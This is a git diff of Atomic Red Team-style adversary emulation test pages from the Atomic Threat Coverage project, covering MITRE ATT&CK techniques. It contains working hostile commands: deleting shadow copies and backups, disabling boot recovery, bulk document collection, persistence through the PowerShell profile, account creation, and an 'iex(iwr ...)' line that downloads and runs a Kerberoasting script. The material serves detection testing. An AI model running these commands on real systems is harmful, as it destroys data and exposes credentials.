for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
```
#### Cleanup Commands:
```cmd
del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
```
@ -43,7 +49,8 @@ for /R c: %f in (*.docx) do copy %f c:\temp\
<br/>
## Atomic Test #2 - Automated Collection PowerShell
Automated Collection
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
to see what was collected.
**Supported Platforms:** Windows
@ -55,9 +62,14 @@ Automated Collection
```powershell
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\T1119_powershell_collection -Force | Out-Null
```
@ -67,7 +79,8 @@ Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:
<br/>
## Atomic Test #3 - Recon information for export with PowerShell
collect information for exfiltration
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows
@ -99,7 +112,8 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
<br/>
## Atomic Test #4 - Recon information for export with Command Prompt
collect information for exfiltration
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows

5
Atomic_Threat_Coverage/Triggers/T1121.md
View File

@ -14,7 +14,7 @@ Adversaries can use Regsvcs and Regasm to proxy execution of code through a trus
<br/>
## Atomic Test #1 - Regasm Uninstall Method Call Test
Executes the Uninstall Method, No Admin Rights Required
Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed.
**Supported Platforms:** Windows
@ -62,7 +62,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - Regsvs Uninstall Method Call Test
Executes the Uninstall Method, No Admin Rights Required, Requires SNK
Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
along with other information about the assembly being installed.
**Supported Platforms:** Windows

4
Atomic_Threat_Coverage/Triggers/T1124.md
View File

@ -14,7 +14,7 @@ An adversary may gather the system time and/or time zone from a local or remote
<br/>
## Atomic Test #1 - System Time Discovery
Identify the system time
Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
**Supported Platforms:** Windows
@ -44,7 +44,7 @@ w32tm /tz
<br/>
## Atomic Test #2 - System Time Discovery - PowerShell
Identify the system time via PowerShell
Identify the system time via PowerShell. Upon execution, the system time will be displayed.
**Supported Platforms:** Windows

6
Atomic_Threat_Coverage/Triggers/T1136.md
View File

@ -100,7 +100,8 @@ dscl . -delete /Users/#{username}
<br/>
## Atomic Test #3 - Create a new user in a command prompt
Creates a new user in a command prompt
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
**Supported Platforms:** Windows
@ -134,7 +135,8 @@ net user /del "#{username}"
<br/>
## Atomic Test #4 - Create a new user in PowerShell
Creates a new user in PowerShell
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
**Supported Platforms:** Windows

17
Atomic_Threat_Coverage/Triggers/T1138.md
View File

@ -26,11 +26,8 @@ To keep shims secure, Windows designed them to run in user mode so they cannot m
<br/>
## Atomic Test #1 - Application Shim Installation
To test injecting DLL into a custom application
you need to copy AtomicShim.dll Into C:\Tools
As well as Compile the custom app.
We believe observing the shim install is a good
place to start.
Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
will be displayed.
**Supported Platforms:** Windows
@ -48,9 +45,12 @@ place to start.
```cmd
sdbinst.exe #{file_path}
sdbinst.exe -u #{file_path}
```
#### Cleanup Commands:
```cmd
sdbinst.exe -u #{file_path}
```
@ -73,6 +73,8 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - New shim database files created in the default shim database directory
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows
@ -103,6 +105,9 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAc
<br/>
## Atomic Test #3 - Registry key creation and/or modification events for SDB
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
the registry keys that were created. These keys can also be viewed using the Registry Editor.
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
**Supported Platforms:** Windows

88
Atomic_Threat_Coverage/Triggers/T1158.md
View File

@ -94,58 +94,92 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
<br/>
## Atomic Test #3 - Create Windows System File with Attrib
Creates a file and marks it as a system file using the attrib.exe utility.
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
and observe that the Attributes are "SA" for System and Archive.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1158.txt|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
echo T1158 > %TEMP%\T1158.txt
attrib.exe +s %TEMP%\T1158.txt
attrib.exe +s #{file_to_modify}
```
#### Cleanup Commands:
```cmd
del /A:S %TEMP%\T1158.txt >nul 2>&1
del /A:S #{file_to_modify} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file must exist on disk at specified location (#{file_to_modify})
##### Check Prereq Commands:
```cmd
IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo system_Attrib_T1158 >> #{file_to_modify}
```
<br/>
<br/>
## Atomic Test #4 - Create Windows Hidden File with Attrib
Creates a file and marks it as hidden using the attrib.exe utility.
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes are "SH" for System and Hidden.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1158.txt|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
echo T1158_hidden > %TEMP%\T1158_hidden.txt
attrib.exe +h %TEMP%\T1158_hidden.txt
attrib.exe +h #{file_to_modify}
```
#### Cleanup Commands:
```cmd
del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
del /A:H #{file_to_modify} >nul 2>&1
```
#### Dependencies: Run with `command_prompt`!
##### Description: The file must exist on disk at specified location (#{file_to_modify})
##### Check Prereq Commands:
```cmd
IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo system_Attrib_T1158 >> #{file_to_modify}
```
<br/>
@ -238,7 +272,8 @@ defaults write com.apple.finder AppleShowAllFiles NO
<br/>
## Atomic Test #8 - Create ADS command prompt
Create an Alternate Data Stream with the command prompt. Write access is required.
Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
**Supported Platforms:** Windows
@ -248,7 +283,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name of file to create ADS on. | string | test.txt|
| file_name | File name of file to create ADS on. | string | %temp%&#92;T1158_has_ads_cmd.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@ -256,7 +291,6 @@ Create an Alternate Data Stream with the command prompt. Write access is require
```cmd
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
```
@ -268,13 +302,26 @@ del #{file_name} >nul 2>&1
#### Dependencies: Run with `command_prompt`!
##### Description: The file must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```cmd
IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
echo normal_text >> #{file_name} >nul 2>&1
```
<br/>
<br/>
## Atomic Test #9 - Create ADS PowerShell
Create an Alternate Data Stream with PowerShell. Write access is required.
Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
**Supported Platforms:** Windows
@ -284,7 +331,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name of file to create ADS on. | string | test.txt|
| file_name | File name of file to create ADS on. | string | $env:TEMP&#92;T1158_has_ads_powershell.txt|
| ads_filename | Name of ADS file. | string | adstest.txt|
@ -295,7 +342,6 @@ Create an Alternate Data Stream with PowerShell. Write access is required.
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
```
#### Cleanup Commands:
@ -305,6 +351,18 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore
#### Dependencies: Run with `powershell`!
##### Description: The file must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{file_name} | Out-Null
```
<br/>

4
Atomic_Threat_Coverage/Triggers/T1208.md
View File

@ -21,6 +21,8 @@ This test uses the Powershell Empire Module: https://github.com/EmpireProject/Em
The following are further sources and credits for this attack:
[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
[Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
when executed successfully , the test displays available services with their hashes.
If the testing domain doesn't have any service principal name configured, there is no output
**Supported Platforms:** Windows
@ -32,7 +34,7 @@ The following are further sources and credits for this attack:
```powershell
Import-Module .\Invoke-Kerberoast.ps1
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
Invoke-Kerberoast | fl
```

8
Atomic_Threat_Coverage/Triggers/T1218.md
View File

@ -232,6 +232,8 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
Execute arbitrary DLL file stored locally. Commonly seen in application installation.
Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
By default, if the src folder is not in place, it will download the 64 bit version.
**Supported Platforms:** Windows
@ -241,7 +243,7 @@ Execute arbitrary DLL file stored locally. Commonly seen in application installa
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;Win32&#92;T1218-2.dll|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;x64&#92;T1218.dll|
#### Attack Commands: Run with `command_prompt`!
@ -255,7 +257,7 @@ msiexec.exe /y "#{dll_payload}"
#### Dependencies: Run with `powershell`!
##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
@ -263,7 +265,7 @@ if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
```

10
Atomic_Threat_Coverage/Triggers/T1220.md
View File

@ -31,7 +31,7 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
<br/>
## Atomic Test #1 - MSXSL Bypass using local files
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@ -84,7 +84,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - MSXSL Bypass using remote files
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@ -132,7 +132,7 @@ Executes the code specified within a XSL script using a local payload.
```cmd
wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
```
@ -157,7 +157,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #4 - WMIC bypass using remote XSL file
Executes the code specified within a XSL script using a remote payload.
Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
@ -175,7 +175,7 @@ Executes the code specified within a XSL script using a remote payload.
```cmd
wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}"
```

143
Atomic_Threat_Coverage/Triggers/T1485.md
View File

@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
<br/>
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe delete shadows /all /quiet
```
<br/>
<br/>
## Atomic Test #2 - Windows - Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin.exe delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
<br/>
<br/>
## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete.
Requires the download of either Sysinternals Suite or the individual SDelete utility.
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder&#92;T1485&#92;bin&#92;sdelete.exe|
| sdelete_exe | Path of sdelete executable | Path | $env:TEMP&#92;Sdelete&#92;sdelete.exe|
| file_to_delete | Path of file to delete | path | $env:TEMP&#92;T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1485.txt
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{sdelete_exe}) {0} else {1}
if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
Remove-Item $env:TEMP\SDelete.zip -Force
```
##### Description: The file to delete must exist at #{file_to_delete}
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
New-Item #{file_to_delete} -Force | Out-Null
```
@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
<br/>
<br/>
## Atomic Test #5 - macOS/Linux - Overwrite file with DD
## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
```
<br/>

14
Atomic_Threat_Coverage/Triggers/T1489.md
View File

@ -16,7 +16,9 @@ Adversaries may accomplish this by disabling individual services of high importa
<br/>
## Atomic Test #1 - Windows - Stop service using Service Controller
Stops a specified service using the sc.exe command.
Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running infomration will be displayed saying
it has changed to a state of STOP_PENDING. If the spooler service was not running "The service has not been started." will be displayed and it can be
started by running the cleanup command.
**Supported Platforms:** Windows
@ -49,7 +51,9 @@ sc.exe start #{service_name}
<br/>
## Atomic Test #2 - Windows - Stop service using net.exe
Stops a specified service using the net.exe command.
Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
started by running the cleanup command.
**Supported Platforms:** Windows
@ -82,8 +86,10 @@ net.exe start #{service_name}
<br/>
## Atomic Test #3 - Windows - Stop service by killing process
Stops a specified service killng the service's process.
This technique was used by WannaCry.
Stops a specified service killng the service's process.
This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
started by running the cleanup command.
**Supported Platforms:** Windows

66
Atomic_Threat_Coverage/Triggers/T1490.md
View File

@ -21,11 +21,18 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
<br/>
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
**Supported Platforms:** Windows
@ -43,6 +50,18 @@ vssadmin.exe delete shadows /all /quiet
#### Dependencies: Run with `powershell`!
##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
##### Check Prereq Commands:
```powershell
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
vssadmin.exe create shadow /for=c:
```
<br/>
@ -50,6 +69,7 @@ vssadmin.exe delete shadows /all /quiet
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Shadow copies can only be created on Windows server or Windows 8.
**Supported Platforms:** Windows
@ -73,7 +93,8 @@ wmic.exe shadowcopy delete
<br/>
## Atomic Test #3 - Windows - Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
**Supported Platforms:** Windows
@ -97,8 +118,8 @@ wbadmin.exe delete catalog -quiet
<br/>
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
**Supported Platforms:** Windows
@ -114,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
@ -123,9 +149,35 @@ bcdedit.exe /set {default} recoveryenabled no
<br/>
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Executes Get-WMIObject
Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
there may be no output displayed.
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
```
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
**Supported Platforms:** Windows
@ -137,7 +189,7 @@ Executes Get-WMIObject
```cmd
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```

3
Atomic_Threat_Coverage/Triggers/T1502.md
View File

@ -15,6 +15,9 @@ Explicitly assigning the PPID may also enable [Privilege Escalation](https://att
## Atomic Test #1 - Parent PID Spoofing using PowerShell
This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.
Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and
calc.exe will be launched.
Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
**Supported Platforms:** Windows

25
Atomic_Threat_Coverage/Triggers/T1504.md
View File

@ -14,7 +14,7 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
<br/>
## Atomic Test #1 - Append malicious start-process cmdlet
Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable
Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.
**Supported Platforms:** Windows
@ -32,14 +32,9 @@ Appends a start process cmdlet to the current user's powershell profile pofile t
```powershell
if(Test-Path #{ps_profile}){
}
else{
New-Item -Path #{ps_profile} -Type File -Force
}
$malicious = "Start-Process #{exe_path}"
Add-Content #{ps_profile} -Value $malicious
powershell -command exit
Add-Content #{ps_profile} -Value ""
Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
powershell -Command exit
```
#### Cleanup Commands:
@ -50,6 +45,18 @@ Set-Content $profile -Value $oldprofile
#### Dependencies: Run with `powershell`!
##### Description: Ensure a powershell profile exists for the current user
##### Check Prereq Commands:
```powershell
if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Path #{ps_profile} -Type File -Force
```
<br/>

6
Atomic_Threat_Coverage/Triggers/T1518.md
View File

@ -12,7 +12,8 @@
<br/>
## Atomic Test #1 - Find and Display Internet Explorer Browser Version
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Query the registry to determine the version of internet explorer installed on the system.
Upon execution, version information about internet explorer will be displayed.
**Supported Platforms:** Windows
@ -36,7 +37,8 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
<br/>
## Atomic Test #2 - Applications Installed
Adversaries may attempt to get a listing of all software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Query the registry to determine software and versions installed on the system. Upon execution a table of
software name and version information will be displayed.
**Supported Platforms:** Windows

5
Atomic_Threat_Coverage/Triggers/T1531.md
View File

@ -14,7 +14,8 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
<br/>
## Atomic Test #1 - Change User Password - Windows
Changes the user password to hinder access attempts. Seen in use by LockerGoga.
Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
the password "HuHuHUHoHo283283".
**Supported Platforms:** Windows
@ -61,7 +62,7 @@ net user #{user_account} #{new_user_password} /add
<br/>
## Atomic Test #2 - Delete User - Windows
Deletes a user account to prevent access.
Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.
**Supported Platforms:** Windows

2
analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile.json
View File

File diff suppressed because one or more lines are too long

2
analytics/generated/attack_navigator_profiles/atc_attack_navigator_profile_CU_0001_TESTCUSTOMER.json
View File

@ -1 +1 @@
{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, 